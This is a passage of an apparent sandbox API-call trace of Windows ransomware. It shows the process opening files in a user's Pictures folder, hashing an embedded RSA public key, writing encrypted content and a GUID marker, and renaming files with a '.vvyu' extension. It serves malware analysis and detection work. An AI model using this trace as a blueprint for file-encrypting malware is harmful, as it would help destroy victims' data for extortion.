Flags=0x0, Size=0x18) returned 0x2a26ae8 [0190.332] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0190.332] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dc58 [0190.332] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0190.332] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0dce8 [0190.332] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0190.332] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7da0 [0190.332] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0190.332] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dcb8 [0190.332] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0190.332] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dca0 [0190.332] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0190.332] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0dd00 [0190.332] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dca0 | out: hHeap=0x2c0000) returned 1 [0190.332] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0dca0 [0190.333] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dcb8 | out: hHeap=0x2c0000) returned 1 [0190.333] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0190.333] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0190.333] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0190.333] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0190.333] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0190.333] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dc70 | out: hHeap=0x2c0000) returned 1 [0190.333] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0dc70 [0190.333] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0190.333] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af3f88 [0190.333] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dcd0 | out: hHeap=0x2c0000) returned 1 [0190.333] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0190.333] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dd00 | out: hHeap=0x2c0000) returned 1 [0190.333] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af4198 [0190.333] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0190.333] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0190.334] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0190.334] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0190.334] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dc70 | out: hHeap=0x2c0000) returned 1 [0190.334] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af43b0 [0190.334] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0190.334] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0190.335] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0190.335] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0190.335] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0190.336] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0190.336] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0190.336] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0190.336] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4198 | out: hHeap=0x2c0000) returned 1 [0190.337] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b0 | out: hHeap=0x2c0000) returned 1 [0190.337] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0190.337] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0190.337] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dca0 | out: hHeap=0x2c0000) returned 1 [0190.337] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0190.337] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dce8 | out: hHeap=0x2c0000) returned 1 [0190.337] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0190.337] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dc88 | out: hHeap=0x2c0000) returned 1 [0190.337] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dc58 | out: hHeap=0x2c0000) returned 1 [0190.338] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0190.338] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0190.338] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0190.338] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dc40 | out: hHeap=0x2c0000) returned 1 [0190.338] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3108 | out: hHeap=0x2c0000) returned 1 [0190.338] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0190.339] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0190.339] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40108 | out: hHeap=0x2c0000) returned 1 [0190.340] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0190.340] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0190.340] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0190.340] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0190.340] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0190.341] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0190.341] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0190.341] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfa00 | out: hHeap=0x2c0000) returned 1 [0190.341] WriteFile (in: hFile=0x584, lpBuffer=0x2ae5ea0*, nNumberOfBytesToWrite=0x1d4f, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ae5ea0*, lpNumberOfBytesWritten=0x2f9fb14*=0x1d4f, lpOverlapped=0x0) returned 1 [0190.342] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5ea0 | out: hHeap=0x2c0000) returned 1 [0190.342] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x1d54, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0190.342] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0190.343] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0190.343] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ee78 [0190.343] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af3f88 [0190.343] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af3f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0190.343] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af43b8 [0190.343] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0190.344] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ee78 | out: hHeap=0x2c0000) returned 1 [0190.344] WriteFile (in: hFile=0x584, lpBuffer=0x2af43b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af43b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0190.344] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b8 | out: hHeap=0x2c0000) returned 1 [0190.344] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0190.345] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0190.345] CloseHandle (hObject=0x584) returned 1 [0190.346] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbcb0 [0190.346] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x870) returned 0x2af3f88 [0190.346] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbcb0 | out: hHeap=0x2c0000) returned 1 [0190.346] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\877l5thXMZRFuEmTVa.png" (normalized: "c:\\users\\keecfmwgj\\pictures\\877l5thxmzrfuemtva.png"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\877l5thXMZRFuEmTVa.png.vvyu" (normalized: "c:\\users\\keecfmwgj\\pictures\\877l5thxmzrfuemtva.png.vvyu")) returned 1 [0190.348] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0190.348] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0190.348] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.351] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbb48 | out: hHeap=0x2c0000) returned 1 [0190.351] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4605d080, ftCreationTime.dwHighDateTime=0x1d89f17, ftLastAccessTime.dwLowDateTime=0xeba56a10, ftLastAccessTime.dwHighDateTime=0x1d8a551, ftLastWriteTime.dwLowDateTime=0xeba56a10, ftLastWriteTime.dwHighDateTime=0x1d8a551, nFileSizeHigh=0x0, nFileSizeLow=0x2b1f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="99O Q.gif", cAlternateFileName="99OQ~1.GIF")) returned 1 [0190.351] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af3108 [0190.351] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x5e) returned 0x2a2ee78 [0190.352] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3108 | out: hHeap=0x2c0000) returned 1 [0190.352] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\99O Q.gif") returned=".gif" [0190.352] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\99O Q.gif" (normalized: "c:\\users\\keecfmwgj\\pictures\\99o q.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0190.353] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=11039) returned 1 [0190.353] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0190.357] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x2af9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0190.357] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0190.358] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0190.359] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0190.359] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0190.359] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x2b1f, lpOverlapped=0x0) returned 1 [0190.360] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0190.360] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0190.360] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0190.360] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0190.360] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0190.361] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0190.361] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0190.361] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0190.361] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0190.361] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0190.361] GetLastError () returned 0x0 [0190.361] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0190.361] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0190.362] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0190.362] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0190.362] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0190.362] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0190.362] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0190.362] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0190.362] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0190.362] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2b20) returned 0x2ae5ea0 [0190.362] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0190.363] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0190.363] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adfa00 [0190.363] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0190.363] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0190.363] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0190.363] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af3108 [0190.363] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dc40 [0190.363] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af3150 [0190.363] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dc58 [0190.363] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dc88 [0190.363] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dce8 [0190.363] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dca0 [0190.363] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0190.363] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0190.363] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aee1c8 [0190.363] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af3f88 [0190.363] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dc88 | out: hHeap=0x2c0000) returned 1 [0190.363] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dca0 | out: hHeap=0x2c0000) returned 1 [0190.363] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dce8 | out: hHeap=0x2c0000) returned 1 [0190.364] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0190.364] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0190.364] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dce8 [0190.364] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e30 [0190.364] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0dca0 [0190.364] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0190.364] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2a0dc88 [0190.364] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e40 [0190.364] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0190.364] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0190.364] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0190.364] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0190.364] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0190.364] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ae8 [0190.364] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0190.365] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0190.365] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dca0 | out: hHeap=0x2c0000) returned 1 [0190.365] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0190.365] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dc88 | out: hHeap=0x2c0000) returned 1 [0190.365] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0190.365] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0190.365] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dce8 | out: hHeap=0x2c0000) returned 1 [0190.365] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0190.366] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0190.366] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aee1c8 | out: hHeap=0x2c0000) returned 1 [0190.366] GetCurrentThreadId () returned 0x5d8 [0190.366] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0190.366] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ae4cc8 [0190.366] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0190.366] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0190.366] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0190.366] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0190.366] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0190.366] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0190.366] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0190.367] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0190.367] GetCurrentThreadId () returned 0x5d8 [0190.367] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0190.367] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0190.367] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0190.367] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0190.368] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0190.368] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0190.368] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0190.369] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0190.369] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0190.369] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0190.369] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, 